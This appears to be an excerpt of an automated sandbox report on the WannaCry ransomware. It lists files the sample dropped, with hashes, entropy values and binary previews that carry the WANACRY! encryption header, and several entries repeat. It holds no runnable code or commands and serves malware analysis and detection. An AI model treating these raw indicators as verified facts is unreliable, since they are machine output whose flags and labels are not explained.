                                                                              Preview:WANACRY!......._..?.4.N.....4-.hx....f.6..G..v.z.!...^qp..D...%)e.&.A.Y.%.G.....9r....0(:...k2e. .^sd.h&......}.N.F..&...D....'...X.%.]W..W..0.f..}...~.......}....;`.~../...?.....C.D>...5D.......A......'..#.'a...SX.1r..c.>..;-.2.......~:*.Y...L.0...\f..............!x.....i..V#.m...A..p.yM.[...g..#...Q.^.....T...K..H.:.1.....E...g...W..Y..G....e.#...?......8..._a....ys....1.*.W7Tt../.s^.H.!....S.....2..?....Qj.Q..a .E.M..i..I.k....?..E.j.R.[....n/K2W.y...o3....-......dC.RXab6...........@#."79...r..>..{...,.|.z..1........|...'....g.8.....wy<..l[o..Y.....{w............r....`../...9|.n.$pj..J.{.4..g...K..@....F....2_O7.j9D............0H..{...lZHd.75.....J3.(..c.l.\.PxE.?'..g-...9t..).?..*2D....)...W..Mc..n...x.O6t..Rv...RA-lT....yH[.W...~......z...+7..&E'..p.......p).."l._W.%....ci.e..KW..;fK-..>....I...7H5..UAD8...n.....]Y=...Z...(.~..O9\T.%t.W.?+I,...!...OC}...E.IR..X....75...woH{.....<.a../#..p..]j$...m..9..S...2..}T!....n.......%
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2696
                                                                              Entropy (8bit):7.926168960652491
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkd/wYC01TZw6RhpOoDKhhxEB9dGck1f+XDt1hRi2ucmznWgzWc60Lk5zSiXUdbU:op3C01dwihpOFuXhS+h1hHucmznFz76v
                                                                              MD5:2F7AA124CA2A8ADA1F920085CCA48628
                                                                              SHA1:F928D665387775A1048086A59599C5F33266CC36
                                                                              SHA-256:A7589B36C840D39C6AF473F5EB15A27F84D8DCEA0ADED4F0C7FEECDFEA36D201
                                                                              SHA-512:34F80D9DF1F4A6B2013DEF300143A12436D2309387FBC6BCA0C457FE484C2F40B2727CC522DFAC1B61542BA3B26A1BA6818B9FA24DCFF81A560DC3334C5807D7
                                                                              Malicious:false
                                                                              Preview:WANACRY!....x8...0.6...y.D........G..Je'[.&.[.,.......A..l......}.?..........:}..5$Y.i.>.?.)u.....U..)..n..V..Y..(..R.[.P..$..&.u%Z.TgQ....s.`...CnI.&..n..D.>....._....~e0.m...)...v.!.v.1}......y.*z..{t....Gb[?.s.....H..(I.j9.....F.lf.z....vs.....D.6....g........H...e?.q.w....Q.p.=j..B..&...L>...Wha@....}=]..3...2.,...2r..J.......?....JGk.1.Tt.Dc:.!]&Ff.YXV.S..Ve..J..?...k..P.]....:......Dn...n%.2o.F.s.l..[..!<...\.\....(.Z.z,4.g.:......h....!M..C....t......,.2..|;QM ..f..Z.~.O1.yNa..F!...y..`.......)t<.M^..0}......\.....Y,/<....;<.A.....i...7.....9..\...:.e.=...1..w|lU....4...@p'...i.....+f.~./....9..a.t7....m?...R...Q......>...&.&oGY......*J.....Y-} [..Xo.,.<)}..;r...p...t.\s......'x.F4M.....x.P..4R...0>..I....u..#.n..yj.._#Wo.f...w....T6.... \...w+..`9S.J...~.....^..b-J}X...?.......O.s].._.,.x.....fsh.$.wE.q..UP.6L.;..._...........H....V4.k.dL....*.JP....^2J..<..Kq`.`.6..\.)...J.RL|..~.. h..0xj......m.I`._Ql].../....+...DN-.|.N9fc..}t..>
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2696
                                                                              Entropy (8bit):7.926168960652491
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkd/wYC01TZw6RhpOoDKhhxEB9dGck1f+XDt1hRi2ucmznWgzWc60Lk5zSiXUdbU:op3C01dwihpOFuXhS+h1hHucmznFz76v
                                                                              MD5:2F7AA124CA2A8ADA1F920085CCA48628
                                                                              SHA1:F928D665387775A1048086A59599C5F33266CC36
                                                                              SHA-256:A7589B36C840D39C6AF473F5EB15A27F84D8DCEA0ADED4F0C7FEECDFEA36D201
                                                                              SHA-512:34F80D9DF1F4A6B2013DEF300143A12436D2309387FBC6BCA0C457FE484C2F40B2727CC522DFAC1B61542BA3B26A1BA6818B9FA24DCFF81A560DC3334C5807D7
                                                                              Malicious:false
                                                                              Preview:WANACRY!....x8...0.6...y.D........G..Je'[.&.[.,.......A..l......}.?..........:}..5$Y.i.>.?.)u.....U..)..n..V..Y..(..R.[.P..$..&.u%Z.TgQ....s.`...CnI.&..n..D.>....._....~e0.m...)...v.!.v.1}......y.*z..{t....Gb[?.s.....H..(I.j9.....F.lf.z....vs.....D.6....g........H...e?.q.w....Q.p.=j..B..&...L>...Wha@....}=]..3...2.,...2r..J.......?....JGk.1.Tt.Dc:.!]&Ff.YXV.S..Ve..J..?...k..P.]....:......Dn...n%.2o.F.s.l..[..!<...\.\....(.Z.z,4.g.:......h....!M..C....t......,.2..|;QM ..f..Z.~.O1.yNa..F!...y..`.......)t<.M^..0}......\.....Y,/<....;<.A.....i...7.....9..\...:.e.=...1..w|lU....4...@p'...i.....+f.~./....9..a.t7....m?...R...Q......>...&.&oGY......*J.....Y-} [..Xo.,.<)}..;r...p...t.\s......'x.F4M.....x.P..4R...0>..I....u..#.n..yj.._#Wo.f...w....T6.... \...w+..`9S.J...~.....^..b-J}X...?.......O.s].._.,.x.....fsh.$.wE.q..UP.6L.;..._...........H....V4.k.dL....*.JP....^2J..<..Kq`.`.6..\.)...J.RL|..~.. h..0xj......m.I`._Ql].../....+...DN-.|.N9fc..}t..>
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6136
                                                                              Entropy (8bit):7.966544433120654
                                                                              Encrypted:false
                                                                              SSDEEP:96:oNg/TW9FLzRxdSN3YieK7kgjf4KFtyrdS9ikijyb5D8b6s5MVRMpXR1JHJ+pdh1:V/yPLdxdG3L/PNtyrXkijybOe2MjiRPU
                                                                              MD5:FDDF8FDCCDB8C7CCC59832FD77274493
                                                                              SHA1:1705887B916B7EAEE2E8A7B81A9B6044A04510D2
                                                                              SHA-256:52C98354B46DFC04BEE845F3D9F568EF9F885D48BEDA4F0706C9B65E0BB780E1
                                                                              SHA-512:D0935871D43D97FA7F1A897C065275FFCC8B8A6390EFA7DE40FAF49093E0A788839D535E44F5AAAA7FDCBE1FF10CD6B2EF9A5D76C4D1905FA941C93A4C274734
                                                                              Malicious:false
                                                                              Preview:WANACRY!....].q............F........I.......dXY0G.n=..[.S].F.U.r.y....[`....~p.".I........Ir.3q1a.....Q....7C.;.].'..).......CS..(..,7'.M..2.O...*..2.r4.t...,..|.cJ.=3.N,W...;ztt.........0.vLM...../7...3.FvXI.P.....x.^...|....e..f...`=N.0...1.%$...p.7./.*...............{..X.E1....$..y.|^>........k$.}....9..01.hd..:i..Sm\B./...+U@..u...o...41..G.Y.%..7..P6..z...=....d....g)!...c=.r9.U._.....y.@....=.dV.!DqZ.y)%@.N.(N.@.-...95..Z+.V,...F....Z.J...QF..@x.*..0.,4..+]...p}h|...:<.`...g.O...zh.q".....6......K.YO..a.@.D.{k=.....6; ....@.l...f.E.Y....e.u .0.H..H.Hv...c...L.4w1F.iCL......P.t.T...%..2...<....E^I....p{NBy......<..H.....`.*.ib..d...................T..1....X.'8...&/.....O.)....jB5D.b.7.-..Re.BK....3...:...L.1...ISs..X.hC...jc..mr1..#.`.Yh......m.R..P8.wr....J....;.&-.Vj.:#t.Us.?.....p...T,C}.W..8...i...a{..s..7...!..._L ...V9-rs.7.X .kE..bz#BTf.M{S=..6.....<..f....,.|{...!.s;..@.,,..T....B.......RW.......C0.S...6..).....+I..{.v~...F...qq
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):6136
                                                                              Entropy (8bit):7.966544433120654
                                                                              Encrypted:false
                                                                              SSDEEP:96:oNg/TW9FLzRxdSN3YieK7kgjf4KFtyrdS9ikijyb5D8b6s5MVRMpXR1JHJ+pdh1:V/yPLdxdG3L/PNtyrXkijybOe2MjiRPU
                                                                              MD5:FDDF8FDCCDB8C7CCC59832FD77274493
                                                                              SHA1:1705887B916B7EAEE2E8A7B81A9B6044A04510D2
                                                                              SHA-256:52C98354B46DFC04BEE845F3D9F568EF9F885D48BEDA4F0706C9B65E0BB780E1
                                                                              SHA-512:D0935871D43D97FA7F1A897C065275FFCC8B8A6390EFA7DE40FAF49093E0A788839D535E44F5AAAA7FDCBE1FF10CD6B2EF9A5D76C4D1905FA941C93A4C274734
                                                                              Malicious:false
                                                                              Preview:WANACRY!....].q............F........I.......dXY0G.n=..[.S].F.U.r.y....[`....~p.".I........Ir.3q1a.....Q....7C.;.].'..).......CS..(..,7'.M..2.O...*..2.r4.t...,..|.cJ.=3.N,W...;ztt.........0.vLM...../7...3.FvXI.P.....x.^...|....e..f...`=N.0...1.%$...p.7./.*...............{..X.E1....$..y.|^>........k$.}....9..01.hd..:i..Sm\B./...+U@..u...o...41..G.Y.%..7..P6..z...=....d....g)!...c=.r9.U._.....y.@....=.dV.!DqZ.y)%@.N.(N.@.-...95..Z+.V,...F....Z.J...QF..@x.*..0.,4..+]...p}h|...:<.`...g.O...zh.q".....6......K.YO..a.@.D.{k=.....6; ....@.l...f.E.Y....e.u .0.H..H.Hv...c...L.4w1F.iCL......P.t.T...%..2...<....E^I....p{NBy......<..H.....`.*.ib..d...................T..1....X.'8...&/.....O.)....jB5D.b.7.-..Re.BK....3...:...L.1...ISs..X.hC...jc..mr1..#.`.Yh......m.R..P8.wr....J....;.&-.Vj.:#t.Us.?.....p...T,C}.W..8...i...a{..s..7...!..._L ...V9-rs.7.X .kE..bz#BTf.M{S=..6.....<..f....,.|{...!.s;..@.,,..T....B.......RW.......C0.S...6..).....+I..{.v~...F...qq
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):584
                                                                              Entropy (8bit):7.6203497555304915
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEW4nDh9qzd7VbSnUuAz2nBfhLFYhbXNUSx42jq6pC4bqKu4i7rA0GsL2SJb3:bkXmXqx7VbJzq6hb9UkpC4OKu5XrGW2w
                                                                              MD5:FC9829FD7A478A592406C9BB27A51453
                                                                              SHA1:9FA80B9367FC6C85B74FC0D7B23A26C837937607
                                                                              SHA-256:B2A5BF23E7947E2BE9121334D1B40BB5ADF57D12AF8C89E10DA3275EA447894D
                                                                              SHA-512:616E4413FB449F1DB1B414F67A71C473F5C16D9FA95047AEDC8AFE8887B4E2E1BB1C7A14AE1F2CEC514DBDEC4C5B14AFDC44C207FD653854F91E59957E09AE63
                                                                              Malicious:false
                                                                              Preview:WANACRY!....../..e.......(.|.I\..au....?.'...i.M.......Ig...>9x#C3...4I....4S@..g.'..I.........1.v..>.......)v.j...........,3n.w...j.{.z1.H.M..6.>.{.Cz%.W..IL$..t:.n......h.a...R..9..H(u.Rup.,.4.u.....3..=A+....<.C.....#../...y...[.a.VQ.".$`...+.bdR.A....5....'.................:.&.,b. .W..=..o....c......]U.....*..2....\.m.%.6.J.#.Kr...3p._.....<#o..C5ro.8~.)....M...A..4.J.\....BO.j.BFy......|.n.I.^.kl.m.z.......O^D.+.p.&'..0..>.r...w..h.|.~..^..;.t...s....l...z..(g.@.bW........R./..j)'.?.o...G..)..B..[=9.Z.>B.F.z...........@$_q.@..P4Nt.2....t=...g.hq@
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):584
                                                                              Entropy (8bit):7.6203497555304915
                                                                              Encrypted:false
                                                                              SSDEEP:12:bkEW4nDh9qzd7VbSnUuAz2nBfhLFYhbXNUSx42jq6pC4bqKu4i7rA0GsL2SJb3:bkXmXqx7VbJzq6hb9UkpC4OKu5XrGW2w
                                                                              MD5:FC9829FD7A478A592406C9BB27A51453
                                                                              SHA1:9FA80B9367FC6C85B74FC0D7B23A26C837937607
                                                                              SHA-256:B2A5BF23E7947E2BE9121334D1B40BB5ADF57D12AF8C89E10DA3275EA447894D
                                                                              SHA-512:616E4413FB449F1DB1B414F67A71C473F5C16D9FA95047AEDC8AFE8887B4E2E1BB1C7A14AE1F2CEC514DBDEC4C5B14AFDC44C207FD653854F91E59957E09AE63
                                                                              Malicious:false
                                                                              Preview:WANACRY!....../..e.......(.|.I\..au....?.'...i.M.......Ig...>9x#C3...4I....4S@..g.'..I.........1.v..>.......)v.j...........,3n.w...j.{.z1.H.M..6.>.{.Cz%.W..IL$..t:.n......h.a...R..9..H(u.Rup.,.4.u.....3..=A+....<.C.....#../...y...[.a.VQ.".$`...+.bdR.A....5....'.................:.&.,b. .W..=..o....c......]U.....*..2....\.m.%.6.J.#.Kr...3p._.....<#o..C5ro.8~.)....M...A..4.J.\....BO.j.BFy......|.n.I.^.kl.m.z.......O^D.+.p.&'..0..>.r...w..h.|.~..^..;.t...s....l...z..(g.@.bW........R./..j)'.?.o...G..)..B..[=9.Z.>B.F.z...........@$_q.@..P4Nt.2....t=...g.hq@
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):363208
                                                                              Entropy (8bit):7.99947247013149
                                                                              Encrypted:true
                                                                              SSDEEP:6144:1EdbaJlKkDUe3HN5tIL81ScAZHs582r6u7/AZPK/UiM9oTyb/i+ui12C:1GbSCed/IkScAZHACecoTqFuYN
                                                                              MD5:8A6234C8A17A496B1E003A58D53522E0
                                                                              SHA1:DC22CB0996EDFF526BC6910EFAF534AC4AB72D7A
                                                                              SHA-256:438ACFDEE35EA9762DDC7B61D997ACD6B302FA21CD1D0994D332D1D61FEF703C
                                                                              SHA-512:EBAC8E159B56D2D3B33B27D52CB13769244A8393658F42303BC900CB9BC6582BE7F7679ACA8FA74A69951C6073133D48F8370F0ABA4F7F9A09DE698C524391BD
                                                                              Malicious:true
                                                                              Preview:WANACRY!....V.\.i....0T;PnW.e.J...y.;F_..AY....+..........].Wty.....l..&}.h6^Ii..>?.LJN...@.Y...>(..#....x.=...._.....oP..v.....0.W...+.:..F6l.C.!...>q.HFG.rdj...&;....d.]{r.o....v.7.../U.....9.....%c.T.\..]k.zg.$V..-......s08.....S.&K.2F.I.,...z.18...n.4..............Syu6 ...$.l.X6.B...8r......'.........^..{;.g05..J...Y...`.>S..... ..R....=z..a..%B.t...&.l.cYi>.Q6v.8h.e.'. 8.)?<..3.1t.0..|x.'..*"`.E.o.x..X:..!....-..K.....^..Gh..4..Z.1J.......7...e......2.g....NS......&.m.{7...$c4.aLxh9.....W.. ......N..6......P.Zx.j.W..D..`?.B.J..T....3t2..4.W.NF^E...c.......G.2..=z.#..^.+..n...q-......'c^...i.[C...%9"m2,0m.Z..j.....Y..1X..)...'K;..........L..v.O..@..Wi.#_.*..e..&...L..@..l.`...z.w..].j..-..Q...&A.....*.J..v.y.{my.3KtH...9...h..9S.?.....T.F.cj~.?.|.....&.H..`...B..!.Z#......|Hc..T..#....:....+......S......X|C{"u}O7.~_..S2...8y:\..&YA#h...1I.@J...,-.....(L.0..0hN...9..`..ZsT.w...2...2./`!].Y. ...8.O.V.e;.!...[...Z.{.9S..#T........;E.W.N:..AC'
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):363208
                                                                              Entropy (8bit):7.99947247013149
                                                                              Encrypted:true
                                                                              SSDEEP:6144:1EdbaJlKkDUe3HN5tIL81ScAZHs582r6u7/AZPK/UiM9oTyb/i+ui12C:1GbSCed/IkScAZHACecoTqFuYN
                                                                              MD5:8A6234C8A17A496B1E003A58D53522E0
                                                                              SHA1:DC22CB0996EDFF526BC6910EFAF534AC4AB72D7A
                                                                              SHA-256:438ACFDEE35EA9762DDC7B61D997ACD6B302FA21CD1D0994D332D1D61FEF703C
                                                                              SHA-512:EBAC8E159B56D2D3B33B27D52CB13769244A8393658F42303BC900CB9BC6582BE7F7679ACA8FA74A69951C6073133D48F8370F0ABA4F7F9A09DE698C524391BD
                                                                              Malicious:true
                                                                              Preview:WANACRY!....V.\.i....0T;PnW.e.J...y.;F_..AY....+..........].Wty.....l..&}.h6^Ii..>?.LJN...@.Y...>(..#....x.=...._.....oP..v.....0.W...+.:..F6l.C.!...>q.HFG.rdj...&;....d.]{r.o....v.7.../U.....9.....%c.T.\..]k.zg.$V..-......s08.....S.&K.2F.I.,...z.18...n.4..............Syu6 ...$.l.X6.B...8r......'.........^..{;.g05..J...Y...`.>S..... ..R....=z..a..%B.t...&.l.cYi>.Q6v.8h.e.'. 8.)?<..3.1t.0..|x.'..*"`.E.o.x..X:..!....-..K.....^..Gh..4..Z.1J.......7...e......2.g....NS......&.m.{7...$c4.aLxh9.....W.. ......N..6......P.Zx.j.W..D..`?.B.J..T....3t2..4.W.NF^E...c.......G.2..=z.#..^.+..n...q-......'c^...i.[C...%9"m2,0m.Z..j.....Y..1X..)...'K;..........L..v.O..@..Wi.#_.*..e..&...L..@..l.`...z.w..].j..-..Q...&A.....*.J..v.y.{my.3KtH...9...h..9S.?.....T.F.cj~.?.|.....&.H..`...B..!.Z#......|Hc..T..#....:....+......S......X|C{"u}O7.~_..S2...8y:\..&YA#h...1I.@J...,-.....(L.0..0hN...9..`..ZsT.w...2...2./`!].Y. ...8.O.V.e;.!...[...Z.{.9S..#T........;E.W.N:..AC'
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1336
                                                                              Entropy (8bit):7.856659105424083
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkRea4FpV36x/+cVoka4k859uCUHseXxGraiA+u7v99mRMWIJ1lc1vDpB7:bkwa4N365+Ta5juCUHNUvA+u7v2rIJ1O
                                                                              MD5:879E8B504B0D7497FA00921661C4CE7E
                                                                              SHA1:27040312AE7AACFA07E88E52E1151DC2332DEC0A
                                                                              SHA-256:6143CC7439C197B2A3EA8D1D94CD3532370EBCE9D7F382274EDB4260A88C0540
                                                                              SHA-512:EF33508C16F297B3256B2CE20A4CDED828A02573C95242A9405A24C6ED56E6637FDC24419B9762F4189C89775645E93C12967AE1F664616EC60BE499AE126163
                                                                              Malicious:false
                                                                              Preview:WANACRY!....<.E.w.c...d..Y..v........`..1..%..UkAV.....h..Y..O}_...%$.e(.`....n.._..[nN4...}...E...n...sD.s..T.........n.6d.}\~t/0+Kc.U...4{$.H.]...4.......T..%y..2...._3..n...D.U....yp1^.Mb.$.r{%dM..+..u.i.z@.8........Hh.4d.[......O.lU..{BD.....?.......7p.j................!.n.......rH..........zl$]].d.Xu%....V..M.G#e..2=.....^y..9......rc..(.\Z/.a....r..&..o.~...ru_(I..A`...d.wn...~..y...).....m....ze...@8...7S..$x.&G..tb....l...OV5a|x.A.(..YMk...N..u>.{....6.j.'...p.V~.....5..>.j...=.v..e.N..mT....u.....u..9#e...J...5.`...I../!L.^.u.qX...x.qB.....pT.D...qw.r...[...f..G.=.s..O....w...p...b.....a.;.k...;...4gb......j.........*PWE..S.1d.;.1...n.M.F..\..R..z..C..1....!.....+.SN.?.,..O....a....:k..YZ>......{.?|....b%..$!.Qm..$)...._.6J.g&%.0bc..!.NO.|t...u.X......qd....T!...LC..s..V.i..k...>.*...u..jlS...E0.._.'...[y........./y......j!..k....@L..p.g?.....W./........q%C.Z..B.`.w..r..1R.#...j...TU...I..+.|(.}c....t.qV.T...g.8...q.z.x..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1336
                                                                              Entropy (8bit):7.856659105424083
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkRea4FpV36x/+cVoka4k859uCUHseXxGraiA+u7v99mRMWIJ1lc1vDpB7:bkwa4N365+Ta5juCUHNUvA+u7v2rIJ1O
                                                                              MD5:879E8B504B0D7497FA00921661C4CE7E
                                                                              SHA1:27040312AE7AACFA07E88E52E1151DC2332DEC0A
                                                                              SHA-256:6143CC7439C197B2A3EA8D1D94CD3532370EBCE9D7F382274EDB4260A88C0540
                                                                              SHA-512:EF33508C16F297B3256B2CE20A4CDED828A02573C95242A9405A24C6ED56E6637FDC24419B9762F4189C89775645E93C12967AE1F664616EC60BE499AE126163
                                                                              Malicious:false
                                                                              Preview:WANACRY!....<.E.w.c...d..Y..v........`..1..%..UkAV.....h..Y..O}_...%$.e(.`....n.._..[nN4...}...E...n...sD.s..T.........n.6d.}\~t/0+Kc.U...4{$.H.]...4.......T..%y..2...._3..n...D.U....yp1^.Mb.$.r{%dM..+..u.i.z@.8........Hh.4d.[......O.lU..{BD.....?.......7p.j................!.n.......rH..........zl$]].d.Xu%....V..M.G#e..2=.....^y..9......rc..(.\Z/.a....r..&..o.~...ru_(I..A`...d.wn...~..y...).....m....ze...@8...7S..$x.&G..tb....l...OV5a|x.A.(..YMk...N..u>.{....6.j.'...p.V~.....5..>.j...=.v..e.N..mT....u.....u..9#e...J...5.`...I../!L.^.u.qX...x.qB.....pT.D...qw.r...[...f..G.=.s..O....w...p...b.....a.;.k...;...4gb......j.........*PWE..S.1d.;.1...n.M.F..\..R..z..C..1....!.....+.SN.?.,..O....a....:k..YZ>......{.?|....b%..$!.Qm..$)...._.6J.g&%.0bc..!.NO.|t...u.X......qd....T!...LC..s..V.i..k...>.*...u..jlS...E0.._.'...[y........./y......j!..k....@L..p.g?.....W./........q%C.Z..B.`.w..r..1R.#...j...TU...I..+.|(.}c....t.qV.T...g.8...q.z.x..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1608
                                                                              Entropy (8bit):7.869750102743778
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkBGd8qJRG4/eD+YFoy7Wln9MYAq9SnmOB3Yj0p1iHDhYKGYVp+xW0SYfpqKtqmA:bkRZD+zlutQSn1bTimKfX0SUpQ+hhi
                                                                              MD5:9AC138B5DED984DF0205D822AC3FF411
                                                                              SHA1:896272AEBFBCA301589E7199A57EA59CBEBD8A96
                                                                              SHA-256:77F0D8CE5F5327BA7EA6B50DF1BE8DC729F41CECA2A56C34B89702E60FD8FCAC
                                                                              SHA-512:3523431F5AF935DD9BABFC2759FFF22E5652F2BD15BE73CAC1D7548F25082AFCE3148ECE069415B79238B515F806959D68D9CB3D255687BD4FAA6AFC1883F2A7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....}O.$....D....}.B.R..p..*....c-.~.r...... .....C.z...o..H.M.A...L`.C...2O..>.!.Z.h|.....-.g.....Hi....(C..[.{O3.....a;..\B.j.. G.I:..r#r..w.Y.....].I@+U._.RE.p....$...].^..v.|.CC..|..&T.Oqvi...g5N....X.%.U~.p^......Q...o..3.......~;....j&X..a.....%.........t.. .K..z. 6.N..p..@..C.&mj...9....r....,.._.....>...u..fA...O'.O.<.&.y..k...u..^j..CZh.,..L.E.d$.*..?..........tl..#.J6...=?>.zN5Ni.!.<2J .Gp%......\-.B.S.g~.Pp..'H.T......-[!.@]9..*.A.8rv.|(.ti.tN.}.+...w..3..d...DV....Q..Q..g.LY._....e.......J8.,.._..^ k..}%.:..q..z..(.6?b...u....%9......Y.(3..].|77'..K^HT...>B&.*.r.Q.....4...(?Q..."..~....iz...WS......0.......,A5.u...e.X...9. .B.A,4.*..?.......w..:.R+3$9A.v.@.7.....D:L.^x..3..I.c...W%..m.d......H.k.$.i&..P.y.6..@H.D@.Z49.\....O...u4..Y...`... ...d["......... ..Tq.9....z.L.e.Jyr..D.$y.F9m"R..y#i...L#b..7.^t.1..'..:..A....x.5%..........<....d=.{..T..*..v.R.5.4.S!.W..dt.c........v8Pb.f..r.j...v.~...0\.5.Q.M..h.....i.B.p.....<...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1608
                                                                              Entropy (8bit):7.869750102743778
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkBGd8qJRG4/eD+YFoy7Wln9MYAq9SnmOB3Yj0p1iHDhYKGYVp+xW0SYfpqKtqmA:bkRZD+zlutQSn1bTimKfX0SUpQ+hhi
                                                                              MD5:9AC138B5DED984DF0205D822AC3FF411
                                                                              SHA1:896272AEBFBCA301589E7199A57EA59CBEBD8A96
                                                                              SHA-256:77F0D8CE5F5327BA7EA6B50DF1BE8DC729F41CECA2A56C34B89702E60FD8FCAC
                                                                              SHA-512:3523431F5AF935DD9BABFC2759FFF22E5652F2BD15BE73CAC1D7548F25082AFCE3148ECE069415B79238B515F806959D68D9CB3D255687BD4FAA6AFC1883F2A7
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....}O.$....D....}.B.R..p..*....c-.~.r...... .....C.z...o..H.M.A...L`.C...2O..>.!.Z.h|.....-.g.....Hi....(C..[.{O3.....a;..\B.j.. G.I:..r#r..w.Y.....].I@+U._.RE.p....$...].^..v.|.CC..|..&T.Oqvi...g5N....X.%.U~.p^......Q...o..3.......~;....j&X..a.....%.........t.. .K..z. 6.N..p..@..C.&mj...9....r....,.._.....>...u..fA...O'.O.<.&.y..k...u..^j..CZh.,..L.E.d$.*..?..........tl..#.J6...=?>.zN5Ni.!.<2J .Gp%......\-.B.S.g~.Pp..'H.T......-[!.@]9..*.A.8rv.|(.ti.tN.}.+...w..3..d...DV....Q..Q..g.LY._....e.......J8.,.._..^ k..}%.:..q..z..(.6?b...u....%9......Y.(3..].|77'..K^HT...>B&.*.r.Q.....4...(?Q..."..~....iz...WS......0.......,A5.u...e.X...9. .B.A,4.*..?.......w..:.R+3$9A.v.@.7.....D:L.^x..3..I.c...W%..m.d......H.k.$.i&..P.y.6..@H.D@.Z49.\....O...u4..Y...`... ...d["......... ..Tq.9....z.L.e.Jyr..D.$y.F9m"R..y#i...L#b..7.^t.1..'..:..A....x.5%..........<....d=.{..T..*..v.R.5.4.S!.W..dt.c........v8Pb.f..r.j...v.~...0\.5.Q.M..h.....i.B.p.....<...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):493400
                                                                              Entropy (8bit):7.99966542100446
                                                                              Encrypted:true
                                                                              SSDEEP:12288:1pJUSUU5JiNvFBHq9GfEBlKecb90DNUs/N/zUdq0Sii:3N7QFBHq6Kkb90hU2NYA5ii
                                                                              MD5:B10F87C0DE4FDEB240DF149E94F4580D
                                                                              SHA1:62E3A156DA91D819426E64D3B7F99E8EF7A9BAA2
                                                                              SHA-256:3860CAA77518B22DF9A5F3F25E631D1C7D616EE7CC699F7DF8CED59ECB26D4C8
                                                                              SHA-512:5B16B1A247B36A9F1770028981F68168499D3493E8AF158242097AEF02AB7200D97B941986DC9229AA32920A6F887790BD4B02D189D71803E56FB8C65B187131
                                                                              Malicious:true
                                                                              Preview:WANACRY!..........*U...,....<A......`$VW..y.!._.G.....6.1....!...O+.......9.g.......=.Y....../.-.T.D.h..Pl\.~.^.H..L.PcxG.)G...`..~......5.xz{..E....+..4w".0.EQAG.&.g....s.j...7y..u..;N..L......C.....*8hR.y.rk.U...."..].#......av.....x.G>.Z.O.(|XG.....2.......X.?.wl6Y.%......O.HU.....7.N........S..gl\..h6.~(}...x........(....B........U......T.BE.,-L..&zR...qe.|..L.;z../.9M.*.q0....o..CY.M..p.......n.._...\.,_.l?.EuS<...w>.n.)....a...j1?../.O....,...[$k.h.$.A..I...Q..MY......zy9...EVk...95.kd...*o.0K..]..)..^=.D.-\...3$..MYm.(.y..M.^.+:%:.1.NKpo/!...0..H3c.....].l.!f.7.(..Q5-{0.......|`.P...BQ/N.. .9......X.~/v..=B..h0+~6.. ..u."......qbG.........`d..-~.>...%.A......V.|...4.."....)m./...+...k.^.Y.3........2M...wb.p.'MD).....T+.$..<.jgo..=...&UG&..5^....H.....w.i<.Q..8.9B%...*...k.C.f......2Wz.g.E..."..jrn..7f.P,....!..~...m.H......O.R....<...:ku.gm.ZF5J...-.........+;.C.a...:IZ.QE...G.3e...1Vw.!.-......Y......._..B..:a:..{[.5......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):493400
                                                                              Entropy (8bit):7.99966542100446
                                                                              Encrypted:true
                                                                              SSDEEP:12288:1pJUSUU5JiNvFBHq9GfEBlKecb90DNUs/N/zUdq0Sii:3N7QFBHq6Kkb90hU2NYA5ii
                                                                              MD5:B10F87C0DE4FDEB240DF149E94F4580D
                                                                              SHA1:62E3A156DA91D819426E64D3B7F99E8EF7A9BAA2
                                                                              SHA-256:3860CAA77518B22DF9A5F3F25E631D1C7D616EE7CC699F7DF8CED59ECB26D4C8
                                                                              SHA-512:5B16B1A247B36A9F1770028981F68168499D3493E8AF158242097AEF02AB7200D97B941986DC9229AA32920A6F887790BD4B02D189D71803E56FB8C65B187131
                                                                              Malicious:true
